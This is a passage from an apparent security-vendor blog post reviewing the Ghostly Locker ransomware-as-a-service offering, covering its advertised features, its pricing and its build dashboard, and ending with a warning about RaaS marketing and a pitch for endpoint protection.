      image Ghostly Locker features

      Currently, Ghostly Locker claims to provide the following primary feature set:

      • Silent, Multi-Threaded Encryption
      • Customizable Disk Encryption (full or partial)
      • Customizable Target Extension List
      • Automation of Client Payments
      • Ransom Amount Doubling (after 72 hours)
      • TOR Portal-based Infection Tracking and Management
      • Detailed Campaign Statistics
      • Windows Only Support (x86/x64)
      • Purchase via Direct Payment (BTC) or Escrow via specific advertised forums.

      Ghostly’s pricing model is more ‘traditional’ in that they require an up-front entry fee from those looking to buy ransomware. The more a buyer is willing to pay, the more features they are offered, as well as more time and greater volume of potential infections.

      image Ghostly Locker pricing

      The Ghostly Locker FAQ provides further detail on specific features as well as information around their pricing plans and payment processing.

      image Ghostly Locker FAQ

      The Ghostly Locker dashboard is bloat-free and functional.

      image Ghostly Locker Dashboard

      The ‘Build’ section is where the magic happens. Short and to the point, it does the job. The user has options to enter or update the payment bitcoin address, as well as the payment amount. 

      It is also possible to toggle between full or partial disk encryption. Full disk encryption is slower, and according to the RaaS developer, should be used “when you want to make sure that the files are never recovered.” They notably also state that Full Disk Encryption is “ideal for targeted campaigns”. Ghostly Locker claims to run though encryption on a disk in 1 minute, on average. This is common with most modern ransomware families. It takes very little time to do a great deal of damage. If you think you have a minute of two to adjust and avoid encryption, or if your EDR solution relies on cloud-lookups to convict bad behavior, that can become a problem, very quickly.

      image Ghostly Locker download

      We will cover details on the payloads generated from Ghostly Locker in a separate, upcoming, blog post.

      Conclusion

      What is particularly concerning about this latest rash of ransomware projects is the way they borrow ideas from modern marketing practice in a clear effort to attract first-time buyers and to increase confidence among individuals who might otherwise have only been curious. When highly-skilled criminals are broadening their appeal to zero-skill, would-be villains with slick and seductive marketing tricks, it is a worrying sign that 2019’s wave of ransomware attacks looks likely not only to continue, but – if these kinds of RaaS campaigns are successful – threaten to become worse in 2020.

      Whether the highly-skilled actors behind these kinds of projects are just themselves ordinary criminals or also have a vested interest in encouraging an increase in ransomware attacks for other purposes is an interesting question in light of our recent discovery of links between APTs and crimeware.

      However that may be, SentinelOne’s on-device, endpoint protection is fully capable of preventing infection from Ghostly Locker, Recoil, Cryptonite and other forms of ransomware without reliance on cloud detection. Organizations that have moved beyond depending on legacy AV suites can avoid falling victim to the ransomware plague, but those that haven’t need to catch up quick. As this review shows, the criminals sense a “goldrush” and some of them are only too happy to sell the shovels.


      Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

      Read more about Cyber Security